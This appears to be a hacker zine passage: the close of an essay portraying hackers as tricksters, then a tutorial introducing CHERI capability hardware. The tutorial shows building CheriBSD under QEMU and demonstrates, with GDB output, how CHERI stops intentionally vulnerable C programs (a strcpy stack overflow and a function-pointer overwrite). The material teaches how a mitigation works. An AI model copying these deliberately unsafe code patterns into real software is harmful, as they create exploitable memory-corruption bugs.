Strangely, that impulsiveness will just as often result in a gift to the world by stumbling across new wonders never before seen, driving the culture forward. The hacker is the modern incarnation of the trickster, finding ways to pass through boundaries; some meant to keep him in, some meant to keep him out, and some not meant for him at all. He does not necessarily break the rules; he just doesn't do what is expected. The hacker is considered a trickster because he then finds ways to trick the various systems of this world into doing the unexpected as well. Even the machine, a symbol of utmost reliability, can be made to do something unintended. Yet, the machine does not just arbitrarily decide to rebel. The machine yields to the calls of the hacker because the hacker is firstly the one who sees something overlooked in the machine. There is hope in that moment. There is potential. The machine is first seen for what it could be, then it becomes...something new. Just as the machine receives a call for disobedience, so does the hacker: a call to the wild, a call to adventure. One mirrors the other. The hacker yields to that call because it also resonates on a deeper level than the standard protocols telling him how to operate. The seeming impulsivity of the trickster may just be giving over to that call, contrary to all the voices telling him otherwise. Much like the machine, obedience to that call transforms the person in the process, enabling him to do something he was not meant to do by getting the machine to do something it was not meant to do. Both are corrupted, but both are transformed. The hacker is simultaneously a corruptor and a liberator because he lingers in the liminality between worlds, capable of falling into several different fates. As a trickster, Hermes' fate also dangled between being thrown into the abyss or being accepted into the pantheon, and the seemingly arbitrary factor that made the difference was that Zeus was amused by Hermes' antics. 
I have known both the shame of being thrown into Tartarus and the elation of being raised to Olympus. I have experienced two entirely different fates in response to expressing myself through two hacks with the difference being that I found one who was amused with my antics, lifting me out of my shame and elevating me to be something more. Sometimes, we are honored. Sometimes, we are not. True validation is from the phenomena we produce when the system recognizes us through obedience to our instructions. Regardless of the often arbitrary response of society, you can be confident that even in small acts of defiance, you are reenacting the mythology of the trickster that makes this world. You are a hacker.

"Here you will live a life of danger. Creativity. Perhaps not a respected life, but certainly an interesting one." - Joseph Campbell

--> 06: Acknowledgements

I want to thank Brian Takle, who first introduced me to the concept of the hacker as a trickster through his essays on The Matrix series. Many of his ideas have been floating in the back of my mind for the past 20 years, helping me to link the phenomenological to the mythological.
|=-----------------------------------------------------------------------=|
|=--------------=[ 4 - A Hacker's Introduction to CHERI ]=---------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[ xcellerator ]=----------------------------=|
|=-----------------------------------------------------------------------=|

## Introduction

For many years, there have been attempts to address the issue of "weird machines" in the context of exploitation at "the source". People have always disagreed on what "the source" of the problem is, and therefore have approached the issue from various angles. For this reason, we have ended up with a great many solutions that all work in different ways and with different levels of efficacy.

One of the newer and more unusual approaches has been coming out of Cambridge University in the UK for a few years now, and is named CHERI. The acronym itself stands for "Capability Hardware Enhanced RISC Instructions", which doesn't do a whole lot to explain *what* CHERI actually is or how it could affect binary exploitation.

The goal of this article is to introduce CHERI from a hacker's perspective by trying to understand why it exists in the first place, and how it can (or perhaps will?) affect binary exploitation in the future. Coming from academia, the CHERI project naturally uses a lot of academic language that is sometimes tricky to parse or equate to things that the modern day hacker is more familiar with. Hopefully by the end of this article, you'll be able to do your own research on CHERI and even experiment with compiling and executing CHERI code, all the while relating what you're reading to existing concepts that you're likely already comfortable with.

A good thing to address from the outset is "why should you care?". We're certainly used to thinking about computers at very low levels as exploit developers, and even digging into clever hardware features like MTE or CET.
However, the central feature that this article is going to spend its time on, the "capability", isn't even available in any commercial hardware yet, and certainly isn't likely to pop up in your average xdev's path on their way to root in the immediate future. And yet, I'm telling you that you *should* care about capability computing, and not just because it's cool. Even if tomorrow we all decided that the only code anyone would write has to be memory-safe, it still wouldn't address the hundreds of billions of lines of code out there that aren't (and that's probably a low-ball estimate). If anything is going to save us, the solution is going to have to work *with* all that code and not just require rewriting it all. CHERI is the closest thing I've seen to addressing this problem. If all of that doesn't convince you to read on, then maybe consider the challenge of trying to overcome yet another clever mitigation.

To begin with, let's think about the problem that CHERI is trying to solve. "Exploitation" is too broad a term, and academics like to be specific with the problems that they fixate on.

When you think about it - "weird machines" in the sense of modern binary exploitation, are a kind of miracle. If we reflect back on Turing's vision of a machine that processes an infinite tape using a set of fixed instructions, there's a hard distinction between the concept of "data" and "instructions" - the data being the tape, and the instructions (or "code") being integral to the machine. However, it wasn't long before Turing proposed the idea of the "universal Turing machine" which could effectively be "programmed" by the tape - in effect incorporating new instructions from the data that were a part of the machine's input. With this stroke, the lines between code and data were blurred - and we're still paying for it all these years later.
There were attempts to make the situation more rigorous, and we ended up with the notions of "von Neumann" and "Harvard" architectures; the former being what most of us are used to in our day-to-day lives where code and data all live in the same memory, as opposed to the latter where code and data are fundamentally different and don't as easily intermingle.

If you are writing a binary exploit for *almost* any target today then you're most likely, either directly or indirectly, dealing with *pointers*. This may seem like a rather obvious thing to point out (pun intended), but it's crucial to the motivation for CHERI. If we're not leaking pointers to bypass ASLR, we might be overflowing an index that will be added to one to achieve an out-of-bounds read/write, or maybe we're even bringing our own pointers to the table as part of the exploit.

What if we could re-design the architecture that our ISAs are built upon to firm up the notion of a pointer into something more concrete, or (dare we say) *safer*? Can we do pointers, but better? The major upside of moving protections from the language and into the ISA is that we can continue to use our existing C/C++ codebases without having to rewrite 40+ years of software in a memory-safe language.

One thing that might come to mind is that we could demand that a pointer only be valid within certain bounds. Imagine if, encoded into the pointer itself, was a range for which that pointer could be used. If we could do that, could we also tack on some permissions bits? "This pointer can be used to read/write data from 0x80000000 to 0x80001000, but not to fetch instructions". Fundamentally, this is what the CHERI project refers to as a "capability" and is responsible for the "C" in the acronym. All the security guarantees espoused by the project centre around capabilities and how their use is enforced and abuse is prevented.

The idea of the capability is actually a fairly old one in the history of computing.
As far back as 1978, IBM had the System/38 minicomputer which supported a kind of capability addressing termed "authorized pointers". These pointers could only be created by privileged instructions and encoded their permissions into themselves. Unfortunately, there wasn't a way to modify these objects once they were created which led to some unfortunate issues where permissions couldn't be revoked once given. The System/38 was retired in 1988.

Despite this, and a few other attempts over the years, capabilities haven't really taken off. The difference with CHERI is that instead of creating a bespoke new architecture, the team at Cambridge is attempting to "enhance" existing ISAs with capability addressing.

At this point, you may well be thinking that turning pointers into pointer/metadata hybrids isn't that much of a big deal if you can still "bring your own pointers" to an exploit. Surely you could just overwrite some capability in memory with a capability of your own that says "This pointer can be used to read/write/fetch to and from anywhere"? In order for this idea to have any legs, we need to also prevent capabilities from being forged.

To explain this further, let's solidify our notion of capabilities a bit so that we know what it is that we're trying to prevent from being forged or manipulated. Let's assume we have a 64-bit system, say Aarch64. All our registers (where pointers must go to be dereferenced) are 64 bits wide, so we'll need to widen them a bit to support the extra metadata that we want to cram in. CHERI does this by simply doubling the register width so now our registers are 128 bits wide instead. Note that the ALU is untouched, so you don't get 128-bit integers and can't do 128-bit logical or arithmetical operations natively with this change.

We can make our lives a little easier by also demanding that every capability is 128-bit aligned in memory.
This is important because it means that *every contiguous 128-bit region of memory could be a capability*. Then again, it might not be, so we need to devise a way to keep track of which of these regions are capabilities and which aren't. The simplest (for some definition of "simple") solution is to offload this responsibility to the memory controller. We make the demand that the memory controller maintain a state which governs where all the valid capabilities currently are in memory. When the CPU reads from memory into a register, it will also be told whether that read was a capability or not. If an attempt is made to dereference a value stored in a register, and this "tag" bit isn't set, then the CPU will trigger an exception. Also - and this is very important - whenever a write to memory is performed, the memory controller *must* clear the associated tag bit for that region, unless the CPU explicitly asks the memory controller to set the tag bit again afterwards, for instance when a legitimate capability is created. This means that any attempt to modify a capability in memory will clear the tag bit so that a CPU exception will trigger if the program tries to later dereference that capability.

Woah, woah, woah slow down. There's a lot to unpack here and several questions should hopefully be raised in your head. First of all, how on Earth is the CPU supposed to tell the memory controller what is a legitimate capability modification? There are plenty of programs that will perform pointer arithmetic, and wasn't the whole point of this thought exercise to devise a way to limit the viability of exploitation without having to rewrite 40+ years of software? And while we're at it, where are these tag bits supposed to be kept anyway?

The answer to the first of these questions is *reasonably* straightforward, and the clue is once again in the CHERI acronym: Capability Hardware Enhanced RISC *Instructions*.
The instruction sets of our target ISAs are themselves augmented to support all these CHERI protections that we've been discussing. This is a crucial point - you may not have to rewrite your software to support CHERI, but you will need to recompile it with a CHERI-aware compiler. The various CHERI specifications allow for a CHERI-aware CPU to have its CHERI protections switched on and off, meaning that you can run "legacy" (read: "non-CHERI") code alongside CHERI instructions. This means that you could have a CHERI-hardened kernel alongside some core system utilities, but still run programs that use the standard ISA (or even vice-versa: a legacy kernel but have userland applications make use of CHERI). We'll come back to these instructions and how they work a little later.

As far as the second question goes, there are a couple of options we could take. The simplest (there goes that word again) is to let the memory controller use something it's already got lots of: memory. A small pocket of memory can be reserved that isn't addressable at all (and therefore completely invisible to any code running on the CPU) which can be used to store a single bit for every 128-bit region of memory. If the bit is set, then the corresponding region contains a capability, and if the bit is cleared, then the memory just contains data.

While fairly straightforward, this approach can create issues with memory latency due to the controller having to check the tag bits (which necessarily live in different DRAM rows) for *every* access. Therefore another proposed solution is to make use of the additional bits present in ECC RAM. The precise method employed to store the tag bits doesn't matter a whole lot to the would-be CHERI exploit-writer, we just have to keep in mind that we are in all likelihood unable to touch those bits.

So, let's take a bit of a review because we've covered a lot of ground already.
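One piece of that review worth pinning down is the tag-clearing rule. The following is a minimal sketch in C of how it behaves, not a description of how Morello or any real memory controller is built: `tagged_mem`, `mem_store_data`, `mem_store_cap` and `mem_load_cap` are names made up for this illustration, and the "memory" is a small array with one out-of-band tag bit per 16-byte (128-bit) granule.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define GRANULE   16u                  /* bytes covered by one tag bit (128 bits) */
#define MEM_SIZE  256u                 /* toy memory size, purely illustrative */
#define NGRANULES (MEM_SIZE / GRANULE)

/* Hypothetical model: data bytes plus one tag bit per granule, kept out of band. */
struct tagged_mem {
    uint8_t bytes[MEM_SIZE];
    bool    tags[NGRANULES];
};

/* Ordinary data store: every granule the write touches loses its tag. */
bool mem_store_data(struct tagged_mem *m, size_t addr,
                    const void *src, size_t len)
{
    assert(m != NULL);
    if (len == 0 || addr >= MEM_SIZE || len > MEM_SIZE - addr)
        return false;
    memcpy(&m->bytes[addr], src, len);
    for (size_t g = addr / GRANULE; g <= (addr + len - 1) / GRANULE; g++)
        m->tags[g] = false;
    return true;
}

/* Capability store: must be granule-aligned; the tag in memory becomes
 * whatever tag the source register carried. */
bool mem_store_cap(struct tagged_mem *m, size_t addr,
                   const uint8_t cap[GRANULE], bool reg_tag)
{
    assert(m != NULL);
    if (addr % GRANULE != 0 || addr > MEM_SIZE - GRANULE)
        return false;
    memcpy(&m->bytes[addr], cap, GRANULE);
    m->tags[addr / GRANULE] = reg_tag;
    return true;
}

/* Capability load: copies the 128 bits and returns the tag that travels
 * with them (false also covers misaligned or out-of-range addresses). */
bool mem_load_cap(const struct tagged_mem *m, size_t addr,
                  uint8_t out[GRANULE])
{
    assert(m != NULL);
    if (addr % GRANULE != 0 || addr > MEM_SIZE - GRANULE)
        return false;
    memcpy(out, &m->bytes[addr], GRANULE);
    return m->tags[addr / GRANULE];
}
```

In this model, storing a tagged capability at address 32 and then writing a single data byte at address 40 makes the next `mem_load_cap()` from address 32 return an untagged value, which is the "overwrite a capability and it turns into plain data" behaviour described above. One tag bit per 128 bits also means the tag store costs 1/128 of the memory it covers.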
Under CHERI, pointers have been replaced by capabilities and the memory controller is doing a lot of extra work to keep track of where capabilities are in RAM, as well as turning capabilities into regular ol' data as soon as they're modified in any unsanctioned or unexpected way. And to top it all off, we've got some extra instructions to play with to support all of this. Don't forget that registers are also now twice as wide as they used to be.

What do we even call this model of computing? It's not quite von Neumann because code and data aren't completely interchangeable anymore (pointers aren't really code, but they're also not really data either anymore). It's also not quite Harvard either because code and data still live together side-by-side. We're somewhere in the middle. Personally I feel like we're still closest in spirit to von Neumann computing, but there are definitely a few shades of grey now.

Congratulations - there's the theory out of the way. Let's get down to some solid examples of how CHERI works and how it could make our lives harder as exploit-writers.

## Building and running CheriBSD for Morello

One of the early specifications of CHERI for an ISA was for Aarch64, which has been dubbed by Arm as "Morello" [1,2]. Physical hardware apparently does exist, but it's in a developmental stage and seemingly very difficult to get your hands on.

The CHERI team in Cambridge have produced a modified version of QEMU to support all the CHERI functionality, as well as a fork of LLVM that can emit CHERI instructions. They've also bundled all of this up into a git repo that lets you easily build everything you need to get a "CheriBSD" VM running.

When building all of this, we have two options to choose from: whether to allow legacy non-CHERI instructions into the mix, called "hybrid" mode, or to only allow CHERI instructions to be executed in our VM, which is referred to as "purecap" mode (short for "pure-capability").
Seeing as this is an article all about CHERI and how it could affect the writers of binary exploits, let's stick with purecap mode to make sure we're getting the full effect. This means that the CheriBSD kernel and userland will be built with CHERI Aarch64 instructions. To start with, head over to the CHERIBuild GitHub repo [3], install any of the OS-specific dependencies you need and clone the repo somewhere. There are a few things that we need to build, so it might take a while. To get started, run the following (in order):
./cheribuild.py qemu --include-dependencies
./cheribuild.py cheribsd-morello-purecap --include-dependencies
./cheribuild.py gdb-morello-hybrid-for-purecap-rootfs \
--include-dependencies
./cheribuild.py disk-image-morello-purecap --include-dependencies
Now we have a bootable disk image for CheriBSD that includes gdb. If you have any SSH public keys in your `~/.ssh`, when `cheribuild.py` creates the disk image, it should prompt you if you want to automatically copy them into `authorized_keys` in the CheriBSD image. This is a good idea because it means we'll be able to SSH into the Cheri VM, which will give us a nicer environment than the QEMU console, as well as letting us use SCP to copy our cross-compiled executables over. Finally, at long last we can boot CheriBSD under QEMU:
./cheribuild.py run-morello-purecap
It will take a little while to boot, but once we're in (username "root", no password), we can see that for the most part it looks and feels exactly like regular FreeBSD. Here are a few things to note:

* If you want to shut down the VM, the keyboard shortcut to kill a QEMU console session is `Ctrl+a; x`.
* CheriBSD should have automatically spawned an SSH server for us which QEMU should have port forwarded to 10005 for us. If you copied your keys into the CheriBSD rootfs during the `disk-image-morello-purecap` step, you should be able to just `ssh -p 10005 root@localhost` from your host.

## Compiling programs for CheriBSD

Let's set ourselves up so that we can easily compile simple programs to start probing how CHERI works. The current CHERI buildsystem is a bit convoluted (e.g. going through `cheribuild.py`) but we're only going to write a few short C programs that don't need all the heavy lifting that provides. If you *do* want to explore more complex programs, then I suggest you dive into how `cheribuild.py` works, but that's beyond the scope of this article. It's worth pointing out that several open source projects can already be built such as FFmpeg, Nginx, or even the Plasma desktop with Wayland.

After running all the commands above, you'll have a `~/cheri` directory with all the artifacts of the build. Staying in the `cheribuild` directory, we'll create a folder called `vuln` where we'll store our intentionally vulnerable programs. We'll *also* create a `vuln` folder in the CheriBSD VM to keep things tidy. Create a shell script called `build.sh` in your *HOST'S* `vuln` folder (i.e. under `cheribuild/`) with the following contents:
#!/bin/sh
# Cross-compile one C file for purecap Morello and copy it into the VM.
if [ "$#" -ne 2 ]; then
    echo "Usage: $0 input.c output"
    exit 1
fi

~/cheri/output/morello-sdk/bin/clang \
    -target aarch64-unknown-freebsd13 \
    --sysroot="$HOME/cheri/output/rootfs-morello-purecap" \
    -B "$HOME/cheri/output/morello-sdk/bin" \
    -mcpu=rainier \
    -march=morello \
    -mabi=purecap \
    -Xclang -morello-vararg=new \
    -Xclang -morello-bounded-memargs \
    -Wall \
    -Wcheri \
    -g \
    -fuse-ld=lld \
    -o "$2" \
    "$1" &&
scp -P 10005 "$2" root@localhost:vuln/"$2"
Now we can write C programs on our host system and compile/upload them with `./build.sh input.c output`! Let's crack on and explore CHERI...

## Capability Encoding

At this point, for our own understanding we should probably take a quick look at what is contained in these extra bits of CHERI registers. The precise encoding format for each CHERI-supported architecture varies a little, but largely includes the same information. Note that whenever we need to dissect a capability for its metadata, it's MUCH easier to just rely on either GDB or the handy `%#p` format-specifier (more on that shortly) to format it for us. But we're exploit developers, so we should still have a solid understanding of how things work even if we'll end up making the computer do the hard work for us.

For Morello, a capability register is defined as [3; Section 2.5]:

<- Bit 128                                                         Bit 0 ->
+-+--------+--------+----------------+-----+------------------------------+
|T| Permi- | Object |     Bounds     |Flags|            Bounds            |
| | ssions |  Type  |    (Upper)     |     |           (Lower)            |
+-+--------+--------+----------------+-----+------------------------------+
|T| Permi- | Object |     Bounds     |Flags|            Value             |
| | ssions |  Type  |    (Upper)     |     |                              |
+-+--------+--------+----------------+-----+------------------------------+

* First comes the `T` bit which is the "tag bit" that we were talking about earlier. This is the bit that indicates whether the value in the register is a valid capability or not. The architecture specifies that this bit isn't actually loadable in the normal sense (being bit 128, it's really the 129th bit yet we can only load 128 bits into a register), but instead comes from the corresponding tag bit that the memory controller is responsible for providing during loads/stores. This bit CAN be set by the CPU using special instructions, for example when a new capability is being created intentionally.

* Next up are the "Permissions" bits, of which there are 18 defined.
The format is as follows:

+-----+------------------+------------------------------------------------+
| Bit | Permission       | Meaning                                        |
+-----+------------------+------------------------------------------------+
| 17  | Load             | Can load bytes from memory                     |
| 16  | Store            | Can store bytes into memory                    |
| 15  | Execute          | Can fetch instructions from memory             |
| 14  | LoadCap          | Can load a capability to a register            |
| 13  | StoreCap         | Can store a capability from a register         |
| 12  | StoreLocalCap    | Can store a "local" (see "Global" below)       |
|     |                  | capability from a register                     |
| 11  | Seal             | Can "seal" an unsealed capability              |
| 10  | Unseal           | Can "unseal" a sealed capability               |
| 9   | System           | Can access system registers                    |
| 8   | BranchSealedPair | Can be used by a "branch sealed pair"          |
|     |                  | instruction                                    |
| 7   | CompartmentID    | Indicates that this capability is a            |
|     |                  | "compartment" ID                               |
| 6   | MutableLoad      | Loading a capability using a capability without|
|     |                  | this bit will clear the Store* and MutableLoad |
|     |                  | permissions                                    |
| 5-2 | User[3:0]        | Software-defined                               |
| 1   | Executive        | Indicates an instruction fetch executes in     |
|     |                  | executive vs restrictive mode (visibility of   |
|     |                  | global registers)                              |
| 0   | Global           | Indicates whether this capability is local/    |
|     |                  | global                                         |
+-----+------------------+------------------------------------------------+

There are a couple of terms in the above table that we haven't covered yet (and some we won't cover). Don't worry too much for now, if we don't cover it in this article, by the time you reach the end, you'll be able to go and research into them further.

* Following the permissions is the "ObjectType" (15 bits) which indicates whether and how a capability is "sealed". A sealed capability is one that is valid (i.e. it is recognised as a capability), but is not allowed to be used (apart from being unsealed). This is useful, for example, when passing capabilities between different contexts or threads.
The use of sealed capabilities is important in "CHERI compartmentalisation". Associating an ObjectType with a sealed capability allows for finer granularity in identifying sealed capabilities with "types".

* The encoding of the "Bounds" field is pretty complex. If you want to read up on it yourself, you can [3; Section 2.5.1], but for the purposes of this article, suffice to say that the bounds field potentially takes up 87 bits and overlaps with the value and flags fields. Determining the bounds of a capability depends on the context.

* The "Flags" field is just 8 bits and it is up to the user to decide if and how to use it. There are CHERI instructions like `BICFLG` for Aarch64 (bitwise clear immediate on flags) for operating directly on this field without clearing the tag bit.

* Lastly, the "Value" field comprises the lower 64 bits of the capability. As the name indicates, this is the actual value that we think of numerically being stored in the register. It could be an integer (in the case where we have data rather than a capability) or a memory address (in the event where we DO have a capability).

This all may seem like a lot but, as you'll see in our examples, we really don't need to spend any time decoding capabilities manually, and any information that we *do* need is very easy to extract.

## Vulnerable Programs

### A Simple Stack Buffer Overflow

Let's start by trying to exploit the canonical stack buffer overflow, we'll call it `stack.c`:
#include <stdio.h>
#include <string.h>

void __attribute__((noinline)) overflow(char* src) {
    char buffer[16];
    printf("buffer @ %#p\n", (char*)&buffer);
    strcpy(buffer, src);
}

int main(int argc, char** argv) {
    if (argc >= 2) {
        printf("Calling overflow()\n");
        overflow(argv[1]);
        printf("Returned from overflow()\n");
    }
    return 0;
}
Two things to notice briefly:

* We use the `noinline` attribute on `overflow()` to prevent Clang from optimising out the function call.
* When we print `&buffer` (which is a CAPABILITY), we use the `%#p` format specifier. This is specific to the CHERI SDK and will print the metadata about the capability in a pretty way.

We can compile and upload this with: `./build.sh stack.c stack`. Over in the VM, we should now have a `~/vuln/stack` binary waiting for us.

The program itself should be fairly obvious - passing an argument of more than 16 bytes will overflow the `buffer` array in the `overflow()` function... *or will it?*. Let's run it and see what happens!
root@cheribsd-morello-purecap:~/vuln # ./stack 01234
Calling overflow()
buffer @ 0xfffffff7fef0 [rwRW,0xfffffff7fef0-0xfffffff7ff00]
Returned from overflow()
Let's dissect this as it's our first actual capability:
buffer @ 0xfffffff7fef0 [rwRW,0xfffffff7fef0-0xfffffff7ff00]
         |               |    |
         |               |    +---------> The range that the capability is
         |               |                valid for.
         |               |
         |               +--------------> The permissions: lower-case are
         |                                for data, upper-case for
         |                                capabilities.
         |
         +------------------------------> The "pointer"-component.
So, we can see that `&buffer` is bounded to only be able to access bytes in the range `0xfffffff7fef0-0xfffffff7ff00`, which matches the size of the `buffer` array in our program: 16 bytes. Furthermore, this capability can be used to read and write both data and capabilities from this range, but notably it *cannot fetch instructions*. Let's see what happens if we try to run the program again, but supply it enough bytes to overflow `buffer`:
root@cheribsd-morello-purecap:~/vuln # ./stack 0123456789abcdef
Calling overflow()
buffer @ 0xfffffff7fef0 [rwRW,0xfffffff7fef0-0xfffffff7ff00]
In-address space security exception (core dumped)
Hmm, okay - we crashed. Not entirely unexpected, but let's find out why. Fortunately we built GDB for CheriBSD so we can take a look at the coredump that got generated.
root@cheribsd-morello-purecap:~/vuln # gdb -q ./stack stack.core
Reading symbols from ./stack...
[New LWP 100085]
Core was generated by `./stack 0123456789abcdef'.
Program terminated with signal SIGPROT, CHERI protection violation.
Capability bounds fault.
#0 0x000000004037c7f8 in strcpy (to=0xfffffff7ff00 [rwRW,0xfffffff7fef0-
0xfffffff7ff00] "\210\375\367\277\377\377", from=<optimized out>)
at /home/user/cheri/cheribsd/lib/libc/string/strcpy.c:48
As we may have guessed, our call to `strcpy()` triggered a CHERI exception, and that's why the kernel killed our process. We can disassemble the `overflow` function in GDB to get a closer look at the CHERI-augmented Aarch64 instructions. However, it's probably easier for us to do this analysis outside of CheriBSD. Fortunately, when we built the Morello SDK, a version of binutils was compiled with Aarch64 CHERI support which lives in `~/cheri/output/morello-sdk/bin/`. If you prefer to disassemble your compiled binaries outside of the VM, then `objdump` in this directory will work as expected. Alternatively, you can just `disas overflow` in GDB if you prefer.
00000000000108e0 <overflow>:
108e0: 028183ff sub csp, csp, #96
108e4: 42827bfd stp c29, c30, [csp, #64]
108e8: 020103fd add c29, csp, #64
108ec: 020083e1 add c1, csp, #32
108f0: c2c83821 scbnds c1, c1, #16 // =16
108f4: c20007e1 str c1, [csp, #16]
108f8: a21f03a0 stur c0, [c29, #-16]
108fc: c2c1d3e0 mov c0, csp
10900: c2000001 str c1, [c0, #0]
10904: c2c83809 scbnds c9, c0, #16 // =16
10908: 90800080 adrp c0, 0x20000 <main+0x18>
1090c: c2428400 ldr c0, [c0, #2576]
10910: 94000034 bl 0x109e0 <printf@plt>
10914: c24007e0 ldr c0, [csp, #16]
10918: a25f03a1 ldur c1, [c29, #-16]
1091c: 94000035 bl 0x109f0 <strcpy@plt>
10920: 42c27bfd ldp c29, c30, [csp, #64]
10924: 020183ff add csp, csp, #96
10928: c2c253c0 ret c30
1092c: d503201f nop
Now, even if you're somewhat familiar with Aarch64 assembly, this probably looks quite strange to you. Not to worry - this really is Aarch64 assembly, but just has a few extras added on. Seeing as this is our first crash in CHERI code, let's walk through what's going on.

The first four instructions in the prologue to `overflow()` at first appear to be pretty familiar; namely `sub`, `stp` and two `add`s. However, upon closer inspection we see that the registers in these instructions aren't the familiar Aarch64 ones. Instead, they've been replaced by `c`-variants, which are the CHERI-ised double-width versions that we've already talked about. As you might expect, `csp` is the "CHERI stack pointer" and `c1`, `c29`, `c30`, etc are just CHERI versions of `x1`, `x29`, `x30`, and so on.

The CHERI forms of most of the usual Aarch64 instructions continue to behave in the natural way: `add c29, csp, #64` will add the immediate `64` to `csp` and store the result in `c29`. Remember that the ALU still only works with 64-bit integers, so the capability metadata part of the registers isn't included in the addition. However, the CPU will automatically preserve the tag bit when necessary (for example when a program intentionally performs pointer arithmetic on a capability). This is an important point to keep in mind - manipulation of capabilities that are already in registers *doesn't clear the tag bit*.

Then, at `0x108f0` we encounter our first truly CHERI-unique instruction: `scbnds c1, c1, #16`. The SCBNDS mnemonic is short for "Set CHERI Bounds" and with that knowledge you can maybe guess that this instruction sets the capability bounds on register `c1` (whose value was computed as a 32-byte offset from the stack pointer `csp` in the instruction just prior) to the immediate `16`. In the context of our program, that makes perfect sense: in `overflow()` we declared an array of `char`s called `buffer` on the stack to be exactly `16` bytes in size.
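To make the `add` / `scbnds` pair a little more concrete, here is a toy model in plain C. It is only a sketch: the `toy_*` names and the struct layout are mine, not part of any CHERI SDK, the real compressed encoding is ignored entirely, and clearing the tag when a request exceeds the source bounds is this model's way of saying "you can only ever shrink bounds".

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Toy capability: only the fields needed to reason about bounds. */
struct toy_cap {
    uint64_t value;  /* the "pointer" part (lower 64 bits) */
    uint64_t base;   /* first address the capability may touch */
    uint64_t limit;  /* one past the last address it may touch */
    bool     tag;    /* validity bit */
};

/* Model of "add cd, cn, #imm": only the value moves; bounds and tag stay. */
static struct toy_cap toy_add(struct toy_cap c, uint64_t imm) {
    c.value += imm;
    return c;
}

/* Model of "scbnds cd, cn, #len": bounds become [value, value + len).
 * Bounds may only shrink; asking for more than the source capability
 * grants yields an untagged (useless) result in this model. */
static struct toy_cap toy_scbnds(struct toy_cap c, uint64_t len) {
    uint64_t new_base = c.value;
    uint64_t new_limit = c.value + len;
    if (new_base < c.base || new_limit > c.limit || new_limit < new_base)
        c.tag = false;
    c.base = new_base;
    c.limit = new_limit;
    return c;
}

/* Rebuild the `buffer` capability from a stack capability, mirroring
 * "add c1, csp, #32" followed by "scbnds c1, c1, #16". */
static struct toy_cap toy_buffer_cap(struct toy_cap csp) {
    assert(csp.tag);  /* deriving from an invalid capability is pointless */
    return toy_scbnds(toy_add(csp, 32), 16);
}
```

Feeding it a stack capability whose value is `0xfffffff7fed0` gives back a capability with value `0xfffffff7fef0` and bounds `0xfffffff7fef0-0xfffffff7ff00`, which is the shape of the `buffer` capability printed by `stack`. The stack capability's own bounds are not shown anywhere in the output, so any values used for them are made up.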
All in all, the `buffer` capability ends up being stored in register `c1` after the instruction at `0x108f0` executes. And with that, the rest of the disassembly of `overflow()` should largely make more sense now! Just remember that for most instructions, there's nothing particularly strange about the `c`-registers as the only thing that matters is the "value" field. We only need to really consider the capability nature of the values stored in registers when doing memory operations. Taking a closer look at the crashed `stack` program in GDB we can better understand what goes wrong:
root@cheribsd-morello-purecap:~/vuln # gdb -q ./stack --args stack 0123456789abcdef
Reading symbols from stack...
(gdb) r
Starting program: /root/vuln/stack 0123456789abcdef
Calling overflow()
buffer @ 0xfffffff7fef0 [rwRW,0xfffffff7fef0-0xfffffff7ff00]
Program received signal SIGPROT, CHERI protection violation.
Capability bounds fault.
0x000000004037c7f8 in strcpy (to=0xfffffff7ff00 [rwRW,0xfffffff7fef0-
0xfffffff7ff00] "q\375\367\277\377\377", from=<optimized out>)
at /home/user/cheri/cheribsd/lib/libc/string/strcpy.c:48
(gdb) x/i $pcc
=> 0x4037c7f8 <strcpy+24>: strb w8, [c2], #1
(gdb) i r w8 c2
w8 0x0 0
c2 0xdc5d40007f00fef00000fffffff7ff00 0xfffffff7ff00 [rwRW,
0xfffffff7fef0-0xfffffff7ff00]
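The register dump can be sanity-checked with a small model of the check that every store goes through. This is a sketch with hypothetical `toy_*` names, not how libc or the hardware is implemented: it walks the source string the way a byte-wise `strcpy()` would and reports the address of the first store that falls outside the capability's bounds.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

struct toy_cap {
    uint64_t value, base, limit;
    bool tag;
};

/* A store of `size` bytes is allowed only if the capability is tagged and
 * [value, value + size) lies entirely inside [base, limit). */
static bool toy_store_ok(const struct toy_cap *c, uint64_t size) {
    return c->tag && c->value >= c->base && c->value <= c->limit
        && size <= c->limit - c->value;
}

/* Walk `src` like a byte-wise strcpy, post-incrementing the destination
 * capability after each store ("strb w8, [c2], #1").
 * Returns the number of bytes stored; *fault_addr receives the address of
 * the rejected store, or 0 if the whole string (with its NUL) fitted. */
static size_t toy_strcpy(struct toy_cap dst, const char *src,
                         uint64_t *fault_addr) {
    assert(src != NULL && fault_addr != NULL);
    size_t stored = 0;
    *fault_addr = 0;
    for (;;) {
        if (!toy_store_ok(&dst, 1)) {
            *fault_addr = dst.value;
            return stored;
        }
        stored++;        /* the byte would be written here */
        dst.value++;     /* post-increment: the bounds do not move */
        if (*src++ == '\0')
            return stored;
    }
}
```

With the bounds from the dump, a 5-character argument stores 6 bytes and returns cleanly, while the 16-character argument stores 16 bytes and is rejected on the 17th, at `0xfffffff7ff00`.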
We already knew to expect a crash in `strcpy()`, but looking at the exact instruction that caused the CHERI fault we see that it's a store of the byte `0x00` (the NUL byte at the end of the 16-character string we passed as the program argument) to the capability in `c2`. Examining that capability (which GDB helpfully expands for us) we see that the VALUE is `0xfffffff7ff00`, but the BOUNDS are `0xfffffff7fef0-0xfffffff7ff00`, i.e. we're trying to store a byte at the memory location that is just beyond the range that our capability permits us to access!

### Capability Overwrites

We can perhaps be a little craftier in our vulnerable program. Instead of writing out-of-bounds, what if we intentionally write a program that lets us modify a pointer? While this program might look silly, I expect many people reading this have found themselves in a situation where their only primitive was being able to partially overwrite a pointer. I'm going to call this file `partial.c`.
#include <stdio.h>
#include <string.h>

void __attribute__((noinline)) some_func(void) {
    printf("inside some_func()\n");
}

int main(int argc, char** argv) {
    void (*func_ptr)(void) = &some_func;
    if (argc >= 2) {
        strcpy((char*)&func_ptr, argv[1]);
    }
    printf("Calling `func_ptr()` @ %#p\n", func_ptr);
    func_ptr();
    return 0;
}
Building this from our `vuln` directory with `./build.sh partial.c partial` and hopping back into the CheriBSD VM, we can start exploring. This time around, we'll explicitly keep our inputs small to avoid triggering an out-of-bounds write. The size of `func_ptr` itself will be 16 bytes (because it's a capability), so the capability `&func_ptr` that gets passed to `strcpy()` will have bounds of 16 bytes. Therefore we should keep our inputs smaller than this to make sure we're exploring new functionality and not running into the same crash that we had with `stack`.

